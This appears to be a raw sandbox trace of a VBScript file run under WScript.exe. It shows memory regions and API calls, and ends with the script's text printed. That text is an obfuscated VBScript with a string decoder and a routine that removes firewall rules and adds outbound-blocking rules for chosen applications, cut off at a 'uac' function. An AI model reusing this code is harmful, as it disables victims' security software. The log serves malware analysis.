1004 start_va = 0x1150000 end_va = 0x1164fff entry_point = 0x11513f2 region_type = mapped_file name = "scrrun.dll" filename = "\\Windows\\System32\\scrrun.dll" Region: id = 1005 start_va = 0x1170000 end_va = 0x1182fff entry_point = 0x11f1601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" Region: id = 1006 start_va = 0x745a0000 end_va = 0x74694fff entry_point = 0x745b0d9e region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" Region: id = 1007 start_va = 0x1190000 end_va = 0x1190fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001190000" filename = "" Region: id = 1008 start_va = 0x11a0000 end_va = 0x11a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011a0000" filename = "" Region: id = 1009 start_va = 0x11c0000 end_va = 0x11c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011c0000" filename = "" Region: id = 1010 start_va = 0x2200000 end_va = 0x22fffff entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 1011 start_va = 0x71af0000 end_va = 0x71b3bfff entry_point = 0x71af2c14 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" Region: id = 1012 start_va = 0x74110000 end_va = 0x742adfff entry_point = 0x7413e6b5 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" Region: id = 1013 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 1014 start_va = 0x6e6a0000 end_va = 0x6f11ffff entry_point = 0x6e6a6b95 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\System32\\ieframe.dll" Region: id = 1015 start_va = 0x72190000 end_va = 0x721cbfff entry_point = 0x72193089 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\System32\\oleacc.dll" Region: id = 1016 start_va = 0x76890000 end_va = 0x76a8afff entry_point = 0x768922d9 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" Region: id = 1017 start_va = 0x77360000 end_va = 0x77364fff entry_point = 0x77361438 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" Region: id = 1018 start_va = 0x11b0000 end_va = 0x11b0fff entry_point = 0x11b0000 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\System32\\oleaccrc.dll" Region: id = 1019 start_va = 0x11d0000 end_va = 0x11d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011d0000" filename = "" Region: id = 1020 start_va = 0x75650000 end_va = 0x75744fff entry_point = 0x75651865 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" Region: id = 1021 start_va = 0x770c0000 end_va = 0x771f5fff entry_point = 0x770c1b35 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" Region: id = 1022 start_va = 0x23b0000 end_va = 0x24affff entry_point = 0x0 region_type = private name = "private_0x00000000023b0000" filename = "" Region: id = 1023 start_va = 0x739c0000 end_va = 0x739e0fff entry_point = 0x739c145e region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" Region: id = 1024 start_va = 0x757d0000 end_va = 0x75814fff entry_point = 0x757d11e1 region_type = mapped_file name = "Wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" Region: id = 1025 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 1026 start_va = 0x754f0000 end_va = 0x75501fff entry_point = 0x754f1441 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" Region: id = 1027 start_va = 0x75590000 end_va = 0x755b6fff entry_point = 0x755958b9 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" Region: id = 1028 start_va = 0x766f0000 end_va = 0x7688cfff entry_point = 0x766f17e7 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" Region: id = 1029 start_va = 0x11f0000 end_va = 0x11f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011f0000" filename = "" Region: id = 1030 start_va = 0x1320000 end_va = 0x133cfff entry_point = 0x1320000 region_type = mapped_file name = "{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000c.db" filename = "\\Users\\DSsDPMx042\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000c.db" Region: id = 1031 start_va = 0x24b0000 end_va = 0x28a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000024b0000" filename = "" Region: id = 1032 start_va = 0x75350000 end_va = 0x7535afff entry_point = 0x75351992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" Region: id = 1033 start_va = 0x11e0000 end_va = 0x11e3fff entry_point = 0x11e0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" Region: id = 1034 start_va = 0x1340000 end_va = 0x136ffff entry_point = 0x1340000 region_type = mapped_file name = "{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000007.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000007.db" Region: id = 1035 start_va = 0x1370000 end_va = 0x1373fff entry_point = 0x1370000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" Region: id = 1036 start_va = 0x1380000 end_va = 0x13e5fff entry_point = 0x1380000 region_type = mapped_file name = "{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" Region: id = 1037 start_va = 0x75280000 end_va = 0x7529afff entry_point = 0x752893b9 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" Region: id = 1038 start_va = 0x13f0000 end_va = 0x13f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000013f0000" filename = "" Region: id = 1039 start_va = 0x28b0000 end_va = 0x29affff entry_point = 0x0 region_type = private name = "private_0x00000000028b0000" filename = "" Region: id = 1040 start_va = 0x72080000 end_va = 0x72091fff entry_point = 0x72081200 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" Region: id = 1041 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Thread: id = 86 os_tid = 0xf2c [0222.519] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2afd34 | out: lpSystemTimeAsFileTime=0x2afd34*(dwLowDateTime=0xdfbd0f90, dwHighDateTime=0x1d204ef)) [0222.519] GetCurrentProcessId () returned 0xf28 [0222.519] GetCurrentThreadId () returned 0xf2c [0222.519] GetTickCount () returned 0x3f140 [0222.519] QueryPerformanceCounter (in: lpPerformanceCount=0x2afd2c | out: lpPerformanceCount=0x2afd2c*=16438673633067) returned 1 [0222.519] GetStartupInfoA (in: lpStartupInfo=0x2afd48 | out: lpStartupInfo=0x2afd48*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\System32\\WScript.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0222.538] GetModuleHandleA (lpModuleName=0x0) returned 0x80000 [0222.539] GetModuleHandleA (lpModuleName=0x0) returned 0x80000 [0222.540] GetVersionExA (in: lpVersionInformation=0x2afc58*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x1000000, dwMinorVersion=0x2afba8, dwBuildNumber=0x0, dwPlatformId=0x2afdc8, szCSDVersion="íà!wR\x95\x0b") | out: lpVersionInformation=0x2afc58*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0222.540] GetUserDefaultLCID () returned 0x409 [0222.540] CoInitialize (pvReserved=0x0) returned 0x0 [0222.555] GetCommandLineW () returned="\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\Public\\N3Eg\\N3E.vbs\" " [0222.555] lstrlenW (lpString="\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\Public\\N3Eg\\N3E.vbs\" ") returned 65 [0222.555] GetCurrentThreadId () returned 0xf2c [0222.555] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x2afa68 | out: phkResult=0x2afa68*=0x7c) returned 0x0 [0222.556] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x2afa6c | out: phkResult=0x2afa6c*=0x80) returned 0x0 [0222.556] RegQueryValueExW (in: hKey=0x80, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x2aee1c, lpData=0x2aee20, lpcbData=0x2aee18*=0x400 | out: lpType=0x2aee1c*=0x0, lpData=0x2aee20*=0x0, lpcbData=0x2aee18*=0x400) returned 0x2 [0222.556] RegQueryValueExW (in: hKey=0x7c, lpValueName="Enabled", lpReserved=0x0, lpType=0x2aee1c, lpData=0x2aee20, lpcbData=0x2aee18*=0x400 | out: lpType=0x2aee1c*=0x0, lpData=0x2aee20*=0x0, lpcbData=0x2aee18*=0x400) returned 0x2 [0222.556] RegQueryValueExW (in: hKey=0x80, lpValueName="Enabled", lpReserved=0x0, lpType=0x2aee1c, lpData=0x2aee20, lpcbData=0x2aee18*=0x400 | out: lpType=0x2aee1c*=0x0, lpData=0x2aee20*=0x0, lpcbData=0x2aee18*=0x400) returned 0x2 [0222.556] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x0, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0222.563] RegCloseKey (hKey=0x80) returned 0x0 [0222.564] RegCloseKey (hKey=0x7c) returned 0x0 [0222.564] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x2af838 | out: phkResult=0x2af838*=0x7c) returned 0x0 [0222.564] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x2af834 | out: phkResult=0x2af834*=0x80) returned 0x0 [0222.564] RegQueryValueExW (in: hKey=0x80, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x2aebc4, lpData=0x2aebc8, lpcbData=0x2aebc0*=0x400 | out: lpType=0x2aebc4*=0x0, lpData=0x2aebc8*=0xff, lpcbData=0x2aebc0*=0x400) returned 0x2 [0222.564] RegQueryValueExW (in: hKey=0x7c, lpValueName="LogSecuritySuccesses", lpReserved=0x0, lpType=0x2aebc4, lpData=0x2aebc8, lpcbData=0x2aebc0*=0x400 | out: lpType=0x2aebc4*=0x0, lpData=0x2aebc8*=0xff, lpcbData=0x2aebc0*=0x400) returned 0x2 [0222.564] RegQueryValueExW (in: hKey=0x80, lpValueName="LogSecuritySuccesses", lpReserved=0x0, lpType=0x2aebc4, lpData=0x2aebc8, lpcbData=0x2aebc0*=0x400 | out: lpType=0x2aebc4*=0x0, lpData=0x2aebc8*=0xff, lpcbData=0x2aebc0*=0x400) returned 0x2 [0222.564] RegCloseKey (hKey=0x80) returned 0x0 [0222.564] RegCloseKey (hKey=0x7c) returned 0x0 [0222.564] GetACP () returned 0x4e4 [0222.564] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75900000 [0222.564] GetProcAddress (hModule=0x75900000, lpProcName="HeapSetInformation") returned 0x75954157 [0222.564] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0222.564] FreeLibrary (hLibModule=0x75900000) returned 1 [0222.565] CoRegisterMessageFilter (in: lpMessageFilter=0x3622b8, lplpMessageFilter=0x3622c0 | out: lplpMessageFilter=0x3622c0*=0x0) returned 0x0 [0222.565] IUnknown:AddRef (This=0x3622b8) returned 0x2 [0222.565] GetModuleFileNameW (in: hModule=0x80000, lpFilename=0x2afaa8, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\WScript.exe") returned 0x1f [0222.565] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\System32\\WScript.exe", lpdwHandle=0x2af4bc | out: lpdwHandle=0x2af4bc) returned 0x704 [0222.565] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\System32\\WScript.exe", dwHandle=0x0, dwLen=0x704, lpData=0x2aeda0 | out: lpData=0x2aeda0) returned 1 [0222.565] VerQueryValueW (in: pBlock=0x2aeda0, lpSubBlock="\\", lplpBuffer=0x2af4b8, puLen=0x2af4b4 | out: lplpBuffer=0x2af4b8*=0x2aedc8, puLen=0x2af4b4) returned 1 [0222.565] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x2af4cc | out: phkResult=0x2af4cc*=0x7c) returned 0x0 [0222.566] RegQueryValueExW (in: hKey=0x7c, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x2ae898, lpData=0x2ae89c, lpcbData=0x2ae894*=0x400 | out: lpType=0x2ae898*=0x0, lpData=0x2ae89c*=0x12, lpcbData=0x2ae894*=0x400) returned 0x2 [0222.566] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x2af4c8 | out: phkResult=0x2af4c8*=0x80) returned 0x0 [0222.566] RegQueryValueExW (in: hKey=0x80, lpValueName="TrustPolicy", lpReserved=0x0, lpType=0x2af490, lpData=0x2af4c4, lpcbData=0x2af498*=0x4 | out: lpType=0x2af490*=0x0, lpData=0x2af4c4*=0xab, lpcbData=0x2af498*=0x4) returned 0x2 [0222.566] RegQueryValueExW (in: hKey=0x80, lpValueName="UseWINSAFER", lpReserved=0x0, lpType=0x2ae898, lpData=0x2ae89c, lpcbData=0x2ae894*=0x400 | out: lpType=0x2ae898*=0x0, lpData=0x2ae89c*=0x12, lpcbData=0x2ae894*=0x400) returned 0x2 [0222.566] RegQueryValueExW (in: hKey=0x7c, lpValueName="TrustPolicy", lpReserved=0x0, lpType=0x2af490, lpData=0x2af4c4, lpcbData=0x2af498*=0x4 | out: lpType=0x2af490*=0x0, lpData=0x2af4c4*=0xab, lpcbData=0x2af498*=0x4) returned 0x2 [0222.566] RegQueryValueExW (in: hKey=0x7c, lpValueName="UseWINSAFER", lpReserved=0x0, lpType=0x2ae898, lpData=0x2ae89c, lpcbData=0x2ae894*=0x400 | out: lpType=0x2ae898*=0x1, lpData="1", lpcbData=0x2ae894*=0x4) returned 0x0 [0222.566] lstrlenW (lpString="1") returned 1 [0222.566] lstrlenW (lpString="0") returned 1 [0222.566] lstrlenW (lpString="1") returned 1 [0222.566] lstrlenW (lpString="no") returned 2 [0222.566] lstrlenW (lpString="1") returned 1 [0222.566] lstrlenW (lpString="false") returned 5 [0222.566] RegCloseKey (hKey=0x80) returned 0x0 [0222.566] RegCloseKey (hKey=0x7c) returned 0x0 [0222.566] RegCreateKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x2af4d8, lpdwDisposition=0x0 | out: phkResult=0x2af4d8*=0x7c, lpdwDisposition=0x0) returned 0x0 [0222.566] RegQueryValueExW (in: hKey=0x7c, lpValueName="Timeout", lpReserved=0x0, lpType=0x2af49c, lpData=0x2af4cc, lpcbData=0x2af4a4*=0x4 | out: lpType=0x2af49c*=0x0, lpData=0x2af4cc*=0x14, lpcbData=0x2af4a4*=0x4) returned 0x2 [0222.566] RegQueryValueExW (in: hKey=0x7c, lpValueName="DisplayLogo", lpReserved=0x0, lpType=0x2ae8a4, lpData=0x2ae8a8, lpcbData=0x2ae8a0*=0x400 | out: lpType=0x2ae8a4*=0x1, lpData="1", lpcbData=0x2ae8a0*=0x4) returned 0x0 [0222.567] lstrlenW (lpString="1") returned 1 [0222.567] lstrlenW (lpString="0") returned 1 [0222.567] lstrlenW (lpString="1") returned 1 [0222.567] lstrlenW (lpString="no") returned 2 [0222.567] lstrlenW (lpString="1") returned 1 [0222.567] lstrlenW (lpString="false") returned 5 [0222.567] RegCloseKey (hKey=0x7c) returned 0x0 [0222.567] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x2af4d8, lpdwDisposition=0x0 | out: phkResult=0x2af4d8*=0x7c, lpdwDisposition=0x0) returned 0x0 [0222.567] RegQueryValueExW (in: hKey=0x7c, lpValueName="Timeout", lpReserved=0x0, lpType=0x2af49c, lpData=0x2af4cc, lpcbData=0x2af4a4*=0x4 | out: lpType=0x2af49c*=0x0, lpData=0x2af4cc*=0x14, lpcbData=0x2af4a4*=0x4) returned 0x2 [0222.567] RegQueryValueExW (in: hKey=0x7c, lpValueName="DisplayLogo", lpReserved=0x0, lpType=0x2ae8a4, lpData=0x2ae8a8, lpcbData=0x2ae8a0*=0x400 | out: lpType=0x2ae8a4*=0x0, lpData=0x2ae8a8*=0x31, lpcbData=0x2ae8a0*=0x400) returned 0x2 [0222.567] RegCloseKey (hKey=0x7c) returned 0x0 [0222.567] lstrlenW (lpString="C:\\Users\\Public\\N3Eg\\N3E.vbs") returned 28 [0222.567] lstrlenW (lpString="vbs") returned 3 [0222.567] lstrlenW (lpString="WSH") returned 3 [0222.567] LoadStringW (in: hInstance=0x80000, uID=0x9c5, lpBuffer=0x2ad828, cchBufferMax=2048 | out: lpBuffer="Windows Script Host") returned 0x13 [0222.568] LoadTypeLib (in: szFile="C:\\Windows\\System32\\WScript.exe", pptlib=0x2af050*=0x0 | out: pptlib=0x2af050*=0xcee00) returned 0x0 [0222.572] ITypeLib:GetTypeInfoType (in: This=0xcee00, index=0x81acc, pTKind=0x2af038 | out: pTKind=0x2af038*=851764) returned 0x0 [0222.582] ITypeLib:GetTypeInfoType (in: This=0xcee00, index=0x83c7c, pTKind=0x2af028 | out: pTKind=0x2af028*=851852) returned 0x0 [0222.582] ITypeLib:GetTypeInfoType (in: This=0xcee00, index=0x83c8c, pTKind=0x2af028 | out: pTKind=0x2af028*=851940) returned 0x0 [0222.582] ITypeLib:GetTypeInfoType (in: This=0xcee00, index=0x81cac, pTKind=0x2af028 | out: pTKind=0x2af028*=852028) returned 0x0 [0222.582] IUnknown:Release (This=0xcee00) returned 0x4 [0222.582] GetCurrentThreadId () returned 0xf2c [0222.582] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xcc [0222.582] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x82f25, lpParameter=0x3623e0, dwCreationFlags=0x0, lpThreadId=0x3623f4 | out: lpThreadId=0x3623f4*=0xf34) returned 0xd4 [0222.583] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x2af250*=0xcc, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0xff) returned 0x0 [0222.590] CloseHandle (hObject=0xcc) returned 1 [0222.590] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\N3Eg\\N3E.vbs", nBufferLength=0x104, lpBuffer=0x2af2b0, lpFilePart=0x2af29c | out: lpBuffer="C:\\Users\\Public\\N3Eg\\N3E.vbs", lpFilePart=0x2af29c*="N3E.vbs") returned 0x1c [0222.590] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".vbs", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ae844 | out: phkResult=0x2ae844*=0xe6) returned 0x0 [0222.590] RegQueryValueExW (in: hKey=0xe6, lpValueName=0x0, lpReserved=0x0, lpType=0x2ae80c, lpData=0x2ae848, lpcbData=0x2ae810*=0x800 | out: lpType=0x2ae80c*=0x1, lpData="VBSFile", lpcbData=0x2ae810*=0x10) returned 0x0 [0222.591] RegCloseKey (hKey=0xe6) returned 0x0 [0222.591] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="VBSFile\\ScriptEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ae844 | out: phkResult=0x2ae844*=0xe6) returned 0x0 [0222.591] RegQueryValueExW (in: hKey=0xe6, lpValueName=0x0, lpReserved=0x0, lpType=0x2ae80c, lpData=0x2af080, lpcbData=0x2ae810*=0x200 | out: lpType=0x2ae80c*=0x1, lpData="VBScript", lpcbData=0x2ae810*=0x12) returned 0x0 [0222.591] RegCloseKey (hKey=0xe6) returned 0x0 [0222.591] CLSIDFromString (in: lpsz="VBScript", pclsid=0x2af050 | out: pclsid=0x2af050*(Data1=0xb54f3741, Data2=0x5b07, Data3=0x11cf, Data4=([0]=0xa4, [1]=0xb0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4a, [6]=0x55, [7]=0xe8))) returned 0x0 [0222.592] CoCreateInstance (in: rclsid=0x2af050*(Data1=0xb54f3741, Data2=0x5b07, Data3=0x11cf, Data4=([0]=0xa4, [1]=0xb0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4a, [6]=0x55, [7]=0xe8)), pUnkOuter=0x0, dwClsContext=0x17, riid=0x81aa0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2af04c | out: ppv=0x2af04c*=0x362860) returned 0x0 [0222.668] __dllonexit () returned 0x6c4d7164 [0222.668] __dllonexit () returned 0x6c4d717e [0222.668] __dllonexit () returned 0x6c4d7198 [0222.668] GetUserDefaultLCID () returned 0x409 [0222.669] GetVersion () returned 0x1db10106 [0222.669] DllGetClassObject (in: rclsid=0xd7dbc*(Data1=0xb54f3741, Data2=0x5b07, Data3=0x11cf, Data4=([0]=0xa4, [1]=0xb0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4a, [6]=0x55, [7]=0xe8)), riid=0x76adee84*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2ae334 | out: ppv=0x2ae334*=0x362820) returned 0x0 [0222.669] VBScriptEngine5:IClassFactory:CreateInstance (in: This=0x362820, pUnkOuter=0x0, riid=0x2aece0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2ae320 | out: ppvObject=0x2ae320*=0x362860) returned 0x0 [0222.669] GetUserDefaultLCID () returned 0x409 [0222.669] GetACP () returned 0x4e4 [0222.670] IUnknown:AddRef (This=0x362860) returned 0x2 [0222.670] IUnknown:Release (This=0x362860) returned 0x1 [0222.670] VBScriptEngine5:IUnknown:Release (This=0x362820) returned 0x0 [0222.670] IUnknown:QueryInterface (in: This=0x362860, riid=0x81aa0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2af014 | out: ppvObject=0x2af014*=0x362860) returned 0x0 [0222.670] IUnknown:Release (This=0x362860) returned 0x1 [0222.670] GetCurrentThreadId () returned 0xf2c [0222.670] GetCurrentThreadId () returned 0xf2c [0222.670] GetCurrentThreadId () returned 0xf2c [0222.671] GetUserDefaultLCID () returned 0x409 [0222.671] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0222.671] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x2af004, cchData=6 | out: lpLCData="1252") returned 5 [0222.671] IsValidCodePage (CodePage=0x4e4) returned 1 [0222.671] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a90000 [0222.671] GetProcAddress (hModule=0x76a90000, lpProcName="CoCreateInstance") returned 0x76ad9d0b [0222.671] CoCreateInstance (in: rclsid=0x6c4cb234*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x6c4cb244*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x362a3c | out: ppv=0x362a3c*=0xca978) returned 0x0 [0222.672] IUnknown:AddRef (This=0xca978) returned 0x2 [0222.672] GetCurrentProcessId () returned 0xf28 [0222.672] GetCurrentThreadId () returned 0xf2c [0222.672] GetTickCount () returned 0x3f1ae [0222.672] ISystemDebugEventFire:BeginSession (This=0xca978, guidSourceID=0x6c4cb308, strSessionName="VBScript:00003880:00003884:18258478") returned 0x0 [0222.672] GetCurrentThreadId () returned 0xf2c [0222.672] GetCurrentThreadId () returned 0xf2c [0222.673] CreateFileW (lpFileName="C:\\Users\\Public\\N3Eg\\N3E.vbs" (normalized: "c:\\users\\public\\n3eg\\n3e.vbs"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000000, hTemplateFile=0x0) returned 0x100 [0222.673] GetFileSize (in: hFile=0x100, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1067 [0222.673] CreateFileMappingA (hFile=0x100, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1067, lpName=0x0) returned 0x104 [0222.673] MapViewOfFile (hFileMappingObject=0x104, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x350000 [0222.673] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x350000, cbMultiByte=4199, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4199 [0222.673] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x350000, cbMultiByte=4199, lpWideCharStr=0xd8c0c, cchWideChar=4199 | out: lpWideCharStr="On Error Resume Next\r\n\r\nDim key\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet 